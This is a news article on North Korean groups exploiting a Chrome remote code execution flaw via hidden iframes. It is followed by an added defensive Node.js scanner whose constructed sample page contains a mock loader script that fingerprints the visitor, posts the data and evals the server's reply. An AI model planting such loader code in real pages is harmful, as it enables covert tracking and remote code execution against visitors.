December 11, 2023

Google’s Threat Analysis Group (TAG) said it had discovered two distinct North Korean government-backed attacker groups, whose campaigns it tracks as Operation Dream Job and Operation AppleJeus, exploiting a remote code execution vulnerability in the Chrome web browser.


Both groups reportedly targeted US news media, IT, cryptocurrency and fintech organizations, with evidence of their activity going back as far as January 4th, 2022, though TAG notes that organizations outside the US may have been targeted as well.

TAG said both groups used the same exploit kit, but with different missions and different techniques, and that it is possible the kit is shared with, or available to, other government-backed attackers.

Operation Dream Job targeted 250 people across 10 companies with emails carrying fraudulent job offers purporting to come from companies such as Disney and Oracle, sent from addresses spoofed to look like they came from Indeed or ZipRecruiter. Clicking the link in the email led to a page containing a hidden iframe that triggered the exploit kit.

Operation AppleJeus, on the other hand, targeted more than 85 users in the cryptocurrency and fintech industries using the same exploit kit. That campaign involved compromising at least two legitimate fintech company websites and planting hidden iframes on them to serve the exploit kit to visitors.


The exploit kit first serves heavily obfuscated JavaScript that fingerprints the target system, collects all available client information and sends it back to the command-and-control (C&C) server. If a set of requirements (which TAG did not disclose) was met, the client was then served a Chrome RCE exploit along with some additional JavaScript. If the RCE succeeded, that JavaScript requested the next stage, referred to within the script as the "Sandbox Escape". Because the exploit is only delivered to clients whose fingerprint satisfies the server-side checks, simply re-fetching the landing page from an analysis host will usually not return the exploit stage, which complicates retrieval of the later stages for analysis.
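As an added example that is not part of the original article and not Google TAG's or the attackers' code: a small Node.js scanner that looks for the two on-page traits described above, the hidden iframes planted on the compromised fintech sites and on the job-offer landing pages, and an inline loader script that combines decoding or eval of obfuscated code with client fingerprinting and a beacon back to a remote endpoint. The HTML samples, hostnames, attribute heuristics and indicator thresholds are all constructed for illustration and are not indicators from this campaign.

```javascript
// Added example, not code from the original article, Google TAG or the
// attackers: a regex-based scanner (not a full HTML parser) that flags
// hidden <iframe> elements and inline scripts showing obfuscation plus
// fingerprint-and-beacon behaviour. Run with: node scan.js

const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// attribute name, optionally followed by ="..." | '...' | bareword
const ATTR_RE = /([a-zA-Z-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Parse the attribute string of one tag into a lower-cased name -> value map.
function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4] ?? "").trim();
  }
  return attrs;
}

// Return the reasons an iframe would be invisible to the visitor (empty if none).
function hiddenIframeReasons(attrs) {
  const style = (attrs.style || "").toLowerCase().replace(/\s+/g, "");
  const reasons = [];
  if (/display:none/.test(style)) reasons.push("display:none");
  if (/visibility:hidden/.test(style)) reasons.push("visibility:hidden");
  if (/opacity:0(?![.\d])/.test(style)) reasons.push("opacity:0");
  if (/(left|top):-\d{3,}px/.test(style)) reasons.push("positioned off-screen");
  // width/height may come from attributes or from inline CSS
  const w = parseInt(attrs.width ?? (style.match(/width:(\d+)/) || [])[1], 10);
  const h = parseInt(attrs.height ?? (style.match(/height:(\d+)/) || [])[1], 10);
  if ((Number.isFinite(w) && w <= 1) || (Number.isFinite(h) && h <= 1)) reasons.push("zero-size");
  if ("hidden" in attrs) reasons.push("hidden attribute");
  return reasons;
}

// Heuristics for the loader behaviour described in the article: decoding or
// eval of obfuscated code, and collection of client details that are then
// posted to a remote endpoint. Thresholds are arbitrary illustration values.
function scriptIndicators(body) {
  const reasons = [];
  if (/\beval\s*\(/.test(body)) reasons.push("eval");
  if (/String\.fromCharCode/.test(body)) reasons.push("String.fromCharCode");
  if (/\b(unescape|atob)\s*\(/.test(body)) reasons.push("decoder call");
  if ((body.match(/\\x[0-9a-fA-F]{2}/g) || []).length > 20) reasons.push("hex-escaped strings");
  const fingerprints = /navigator\.(userAgent|platform|plugins|hardwareConcurrency)|screen\.(width|height)/.test(body);
  const beacons = /XMLHttpRequest|fetch\s*\(|sendBeacon/.test(body);
  if (fingerprints && beacons) reasons.push("fingerprint + beacon");
  return reasons;
}

// Scan a page body and return a list of findings.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    const attrs = parseAttrs(m[1]);
    const reasons = hiddenIframeReasons(attrs);
    if (reasons.length) findings.push({ kind: "hidden-iframe", src: attrs.src || "", reasons });
  }
  for (const m of html.matchAll(SCRIPT_RE)) {
    const reasons = scriptIndicators(m[1]);
    if (reasons.length) findings.push({ kind: "suspicious-script", reasons });
  }
  return findings;
}

// Constructed samples (hostnames are placeholders, not real indicators).
const BENIGN_PAGE = `<html><body>
<iframe src="https://video.example/embed/intro" width="560" height="315"></iframe>
<script>document.getElementById("year").textContent = new Date().getFullYear();</script>
</body></html>`;

const INJECTED_PAGE = `<html><body>
<h1>Investor portal</h1>
<iframe src="https://cdn.example/wp-content/load.php" style="display:none; width:0; height:0"></iframe>
<script>
var d={ua:navigator.userAgent,pl:navigator.platform,sw:screen.width,sh:screen.height};
var x=new XMLHttpRequest();x.open("POST","/s1",true);x.send(JSON.stringify(d));
x.onload=function(){eval(String.fromCharCode.apply(null,JSON.parse(x.responseText)));};
</script>
</body></html>`;

console.log(JSON.stringify(scanHtml(INJECTED_PAGE), null, 2));
```

The scanner is a triage aid for responders checking a site suspected of hosting the kit, not a detection rule: a legitimate page can contain a zero-size iframe or an `eval`, and the fingerprint-plus-beacon pattern is what matters most, since it is the first stage the page describes and the only one a non-targeted client will ever be served.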

TAG discovered the activity on February 10th, and Google shipped a fix on February 14th. The company has also added all identified websites and domains to its Safe Browsing database and notified all targeted Gmail and Workspace users about the attempts. Since the browser update is the primary mitigation, administrators should verify that managed Chrome and other Chromium-based browsers have actually picked up the February 14th fix rather than assuming auto-update has run.
